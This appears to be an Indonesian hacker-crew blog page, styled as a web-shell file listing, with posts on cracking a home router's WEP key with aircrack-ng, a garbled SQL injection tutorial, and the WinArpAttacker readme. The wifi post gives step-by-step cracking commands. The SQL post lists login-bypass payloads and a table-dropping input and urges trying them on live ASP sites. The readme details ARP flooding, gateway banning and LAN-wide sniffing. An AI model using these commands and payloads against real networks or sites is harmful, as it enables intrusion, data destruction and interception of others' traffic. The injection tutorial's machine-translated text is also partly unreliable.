t3ll0
Mc-Crew
today : | at : | safemode : ON
> / kaMtiEz / Hmei7 / Jundab / k4L0ng666 / Dr.Cruzz / s13doeL / Boebefa / Ulow / t3ll0 /
name author perms com modified label
Tampilkan postingan dengan label t3ll0. Tampilkan semua postingan
Tampilkan postingan dengan label t3ll0. Tampilkan semua postingan

Membunuh Wireless t3ll0 rwxr-xr-x 0 08.16

Filename Membunuh Wireless
Permission rw-r--r--
Author t3ll0
Date and Time 08.16
Label
Action
wah scrib di bawah ini bisa matikan hotspot loh.... enggak percaya... suuuwer

airmon-ng stop ath0
airmon-ng start wifi0 7

Capturing Packets to a file

airodump-ng -w wep -c 7 --bssid 00:18:F6:AC:11:13

-w = Name of the capture file
-c = Channel of the access point
--bssid = The mac address of the access point

Associate with the access point

aireplay-ng -1 0 -e BTHomeHub-ED36 -a 00:18:F6:AC:11:13 -h 00:20:A6:60:E4:00 ath0
-1 = Fake authentication with AP

-e = essid (AP name)

-a = Mac address of AP (bssid)

-h = Your wireless mac address (source)

aireplay-ng 0841 attack

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:F6:AC:11:13 -h 00:20:A6:60:E4:00 ath0

-2 = interactive frame selection
-p = set frame control word (hex)
-c = set Destination MAC address
-b = AP mac address (bssid)
-h = Your wireless mac address (source)

Cracking Wep key

aircrack-ng -P 1 wep*.cap

-P = PTW debug
1 = disable Klein

kl enggak bisa tlog di googling ya.....

ubuntu 9.10 t3ll0 rwxr-xr-x 0 20.09

Filename ubuntu 9.10
Permission rw-r--r--
Author t3ll0
Date and Time 20.09
Label
Action







coming soon

sql injection t3ll0 rwxr-xr-x 0 05.45

Filename sql injection
Permission rw-r--r--
Author t3ll0
Date and Time 05.45
Label
Action
Before discussing about sql injection first, I will explain what is sql injection and
why can occur.
How SQL injection occurs when the attacker can insert some SQL statement to 'query'
with the manipulation of data input to the application page.
Among the formats such as DB + PHP + MySQL and ASP or MSACCESS with MySQL,
here I will only discuss about ASP + MsSql which I tried on IIS 5 and
some sql injection on the url.
Ordinary Sql Injection is done at the login page in asp in as:
Admin \ login.asp
Login.asp
So who will become the target page, the
aja now we start with the basics of sql injection: d.
Usually in the sql statment
Select id, user_name, password from user
the mean data over the id, user_name and password in the user table.
Bisanya on the login page with using statment result setnya as follows:
select id, user_name, password from user where name = 'echo' and password = 'password'
On IIS and ASP errors when there are sintax akan given a script and displayed in the browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL or Structured Query Language "
should not touch the system calls. But not with MSSQL.
Nah, ga tau kenapa single quote character 'breaks out'
delimiter of its SQL So if for example there inputan
User: echo '; drop table users --
and the consequences will be fatal, and this means is we remove the user table and the empty deh tuh akan loginya: D
oh yes' - 'merukapan mark its MSSQL, so the next command in the execute ga.
Now for more details we are directly on the login script, such as
+ input login password. The name field is' login 'and' pass'. and
SQL is in the asp: var sql = select * from users where username = ' "+ login +"' and password = ' "+ pass"' ";
try if inputan: login: '; drop table users - pass: chfn (* wink * negative)
sure to drop table users tuh
Oops on a whim, gini deh way gampangnya Eden we forget the above: P we practice direct aja>
Try disitus-search site that uses asp and MsSql as its DB, and search or login.asp
admin \ login.asp.
If I go dapet nich sql variable to its
user: admin
pass: 'or 1 = 1 --
Remember we are here only try its time aja ga pinter DBA: d
or:
user: 'or 1 = 1 --
admin: 'or 1 = 1 --
Mas, ga how can i do?
Inget now the average is the admin at all, we search aja deh yg gombol to test if lo ga bisa
create your own script and a test because I try and create your own package to work without the filter
db on it. To test whether a page has Vulnerable, gini caranya:
Pernh you see on the pages ASP, JSP, PHP and CGI in the addressnya:
http://vivtim/index.asp?id=10
In addition we test the login page above before, we do a little test in the additional
such as entering the addressnya: test'1 = 1 --
become http://victim/index.asp?id=test'1 = 1 --
We can also do with a sql injection xss this, try to download the source HTML of the target page
then we tamhankan hidden field on the source as an example:



If we are lucky if a page does not need to enter a username and password.
ditamhakna remember this script in the script I have you download from the target.

Variable 'or 1 = 1 --
Perhaps the wonder why use the variable 'or 1 = 1 - and very penting.Lihat example
written on a web http://victim/index.asp?category=laptop
Tesebut category in the url is a variable name and the computer is input for the page name variable.
If the script is written in ASP will then become:
V_cat = request ( "category")
sqlstr = "SELECT * FROM product WHERE PCategory = '" & v_cat & "'"
Set rs = conn.execute (sqlstr)
We input the data such as the computer will enter into a variable and v_cat on a sql statment
SELECT * FROM product WHERE PCategory = 'laptop'
ago with what hub 'or 1 = 1 ---
if we try to change into http://victim/index.asp?category=laptop
Http://victim/index.asp?category=laptop 'or 1 = 1 --
Varible v_cat We see now the laptop'or 1 = 1 - then in the SQL query will be
SELECT * FROM product WHERE PCategory = 'laptop' or 1 = 1 - '
v_cat means to get input form varibale laptop or var 1 = 1 (empty) that cause
Sql Server will become confused and execute * Select the table in the page
we can go into the db and db teserbut page out of work: d. And the sign - is
mark from the sql to ignore all commands. Can be in the case of login page
We can go into the login page without a password and user name: d.
Possibilities other variables:
Or 1 = 1 --
"Or 1 = 1 --
Or 1 = 1 --
'Or' a '=' a
"Or" a "=" a
') Or (' a '=' a
'Or 0 = 0 --
"Or 0 = 0 --
Or 0 = 0 --
'Or 0 = 0 #
"Or 0 = 0 #
Or 0 = 0 #
'Or' x '=' x
"Or" x "=" x
') Or (' x '=' x
'Or 1 = 1 --
"Or 1 = 1 --
Or 1 = 1 --
'Or a = a --
"Or" a "=" a
') Or (' a '=' a
") Or (" a "=" a
Hi "or" a "=" a
Hi "or 1 = 1 --
Hi 'or 1 = 1 --
Hi 'or' a '=' a
Hi ') or (' a '=' a
Hi ") or (" a "=" a

In addition to entry into the page we are also able to utilize the remote execution of sql Injection
and to the article will be entered in the ezine echo.or.id 3. Hopefully this article useful

sniffed arp packets networking t3ll0 rwxr-xr-x 0 00.18

Filename sniffed arp packets networking
Permission rw-r--r--
Author t3ll0
Date and Time 00.18
Label
Action
Caution: This program is dangerous, it is released just for research, any possible loss caused by this program is no relation with the author (unshadow), if you don't permit this, you must delete it immediately.

If you use this program, I think you permit all of these.

-----------------------------------------------------------------------------

WinArpAttacker is based on wpcap, you must install wpcap driver before running it.

wpcap: http://winpcap.polito.it/install/bin/WinPcap_3_1.exe

If you had installed old version of winpcap, just install WinPcap_3_1.exe overwrite it.

-----------------------------------------------------------------------------

Contents

1. Overview

2. System Requirement

3. What's New

4. Getting Started

5. Known Issues

6. Revision History

7. To do

-----------------------------------------------------------------------------

1. Overview

------------------------------------

WinArpAttacker is a program that can scan,attack,detect and protect computers on local area network.

The features as following:

1.1 Scan

-. It can scan and show the active hosts on the LAN within a very short time (~2-3 seconds).

It has two scan mode, one is normal scanning, the other is antisniff scanning. The later is to find who is sniffing on the lan.

-. It can save and load computer list file.

-. It can scan the Lan regularly for new computer list.

-. It can update the computer list in passive mode using sniffing technology, that is, it can update the computer list from the sender's address of arp request packets without scanning the lan.

-. It can perform advanced scanning when you open advanced scanning dialg on menu.

-. It can scan a B class ip range in advanced scan dialg.

-. It can scan acthost listed in event listview.

1.2 Attack

-. It can pull and collect all the packets on the LAN.

-. It can perform six attacking actions as following:

(1) Arp Flood - Send ip conflict packets to target computers as fast as possible, if you send too much, the target computers will down. :-(

(2) BanGateway - Tell the gateway a wrong mac address of target computers, so the targets can't receive packet from the internet. This attack is to forbid the targets access the internet.

(3) IPConflict - Like Arp Flood, send ip conflict packets to target computers regularly, maybe the users can't work because of regular ip conflict message. what's more, the targets can't access the lan.

(4) SniffGateway - Spoof the targets and the gateway, you can use sniffer to collect packets between them.

(5) SniffHosts - Spoof among two or above targets, you can use sniffer to collect packets among all of them. (dangerous!!!!)

(6) SniffLan - Just like SniffGateway, the difference is that SniffLan sends broadcast arp packets to tell all computers on the lan that this host is just the gateway, So you can sniff all the data between all hosts with the gateway.(dangerous!!!!!!!!!!!!!!)

-. While spoofing ARP tables, it can act as another gateway (or ip-forwarder) without other users' recognition on the LAN.

-. It can collect and forward packets through WinArpAttacker's ipforward function, you had best check disable system ipforward function because WinArpAttacker can do well.

-. All data sniffed by spoofing and forwarded by WinArpAttacker ipforward function will be counted, as you can see on main interface.

-. As your wish, the arp table is recovered automatically in a little time (about 5 seconds). Your also can select not to recover.

1.3 Detect

-. What is the most important function, it can detect almost all attacking actions metioned as above as well as host status. the event WinArpAttacker can detect is listed as following:

SrcMac_Mismath - Host sent an arp packet, its src_mac doesn't match,so the packet will be ignored.

DstMac_Mismath - Host recv an arp packet, its dst_mac doesn't match,so the packet will be ignored.

Arp_Scan - Host is scanning the lan by arp request for a hosts list.

Arp_Antisniff_Scan - Host is scanning the lan for sniffing host,thus the scanner can know who is sniffing.

Host_Online - Host is online now.

Host_Modify_IP - Host modified its ip to or added a new IP.

Host_Modify_MAC - Host modified its mac address.

New_Host - New gost was found.

Host_Add_IP - Host added a new ip address.

Multi_IP_Host - Host has multi-ip addresses.

Multi_Mac_Host - Host has multi-mac addresses.

Attack_Flood - Host sends a lot of arp packets to another host ,so the target computer maybe slow down.

Attack_Spoof - Host sends special arp packets to sniff the data two targets , so the victims' data exposed.

Attack_Spoof_Lan - Host lets all host on the lan believe that it's just a gateway, so the intruder can sniff all hosts' data to the real gateway.

Attack_Spoof_Ban_Access - Host told host that host has a inexist mac,so the targets can't communicate with each other.

Attack_Spoof_Ban_Access_GW - Host told host that the gateway has a inexist mac, so the target can't access the internet through the gateway.

Attack_Spoof_Ban_Access_Lan - Host broadcast host's mac as a inexist mac, so the target can't communicate with all hosts on the lan.

Attack_IP_Conflict - Host found another host has same ip as its, so the target would be disturbed by ip conflict messages.

Local_Arp_Entry_Change - now WinArpAttacker can watch local arp entry, when a host's mac address in local arp table is changed, WinArpAttacker can report.

Local_Arp_Entry_Add - When a mac address of a host is added to local arp table, WinArpAttacker can report.

-. It can explain each event which WinArpAttacker detected.

-. It can save events to file.

1.4 Protect

-. Support arp table protect. when WinArpAttacker detects local or remote host's is being arp-spoofing, it will recover local or remote host's arp tables as you wish.

1.5 Proxy Arp

-. When hosts on your lan request other hosts' mac address, WinArpAttacker will tell it a certain mac address as you wish.

-. It aims to realize accessing the internet without changing your ip on a new lan, but it also can make your lan in a big mass if you assign a wrong mac address.

1.6 Save arp packets

-. It can save all sniffed arp packets to file.

1.7 other features.

-. Support multi-network adapter and multi-ip address and multi-gateway on a computer, you can select different adapter and ip address to scan different lan.

-. Support DHCP and fixed ip address.

-. Count all the arp packets for each host, including sent and recieved arp packets.

Arp R/S Q/P

| |

Action(Recive/Send) Arp packets type(ReQuest/RePly)

- - - -

ArpRQ meaning: The number of arp request packets recieved

ArpRP meaning: The number of arp reply packets recieved

ArpSQ meaning: The number or arp request packets sent

ArpSP meaning: The number or arp reply packets sent

2. System Requirement.

------------------------------------

-. Local : Windows XP/2000/2003(But I hadn't tested it under Windows XP/2003)

-. Remote : All computers including network devices

-. WinPcap driver 3.1/lastest must be needed.

3. What's New

------------------------------------

+ It can scan a large ip range for online hosts by advanced scanning mode.

+ It can protect local and reomte hosts from arp-spoofing.

+ It can enable proxy arp, act as a arp proxy.

+ It can save all sniffed arp packets to file.

4. Getting Started

------------------------------------

-. Firtly, install the latest WinPcap driver.

-. second, just run WinArpAttacker.exe

-. click scan button and start button

-. look at arp information on remote computer with "arp -a"

-. to stop attack, click stop button.

-. to select adapter or ip address, click options button.

-. to modify attacking setup, click options button.

5. Known Issues

1) This program should be run with administrator privilege.

If not, the program will work abnormally.

2) The attacking action is dangerous, so you must be caution.

3) If there are many active hosts (more than 50) and the real gateway may be down on LAN.

6. Revision History

------------------------------------

= bug fixed

+ improvement/modification

[Start of Versions History]

Version 3.50 ( Jun. 4,2006)

+ It can detect local arp table's change.

+ It can protect local and reomte hosts from arp-spoofing.

+ It can enable proxy arp, act as a arp proxy.

+ It can save all sniffed arp packets to file.

+ It allows you send arp packets manunally.

Version 3.02 ( Apr. 26,2006)

+ It can scan a large ip range for online hosts by advanced scanning mode.

Version 3.00 ( Oct. 07, 2005)

--------------------------------

+ It can detect attacking actions.

+ Add serval scanning mode.

+ It can update the host list from ip packets.

Version 1.50 ( May. 16, 2005)

--------------------------------

+ It can scan the Lan regularly for new computer list.

+ It can update the computer list in passive mode using sniffing technology, that is, it can update the computer list from the sender's address of arp request packets without scanning the lan.

+ Add two options: auto scan and update in passive mode.

+ It can diplay localhost's ip address , mac address, gateway ip address and current computer list status on status bar.

+ Add taskbar icon support, if you close the WinArpAttacker's window, it will leave a icon on taskbar, not really close, thus it can update computer list on the background.

Version 1.10 ( April. 27, 2005)

--------------------------------

+ Support DHCP and fixed ip address.

= When flood attack started, to click stop can't really stop flood attacking.

= IP address is incorrectly sorted when 10.1.0.1 and 192.168.1.1 coexists.

= When PacketSendPacket failed, to exit program will encounter an invalid operator.

Version 1.00 ( April. 16, 2005)

--------------------------------

This program is released.

[End of Versions History]

7. To do

none now, if you have good advice you can mailto me(asia_message (at) hotpop (dot) com [email concealed]).

 

Jayalah Indonesiaku © 2010 T3ll0 (Mc-Crew)
VB (Vio b374k) Template design by t3ll0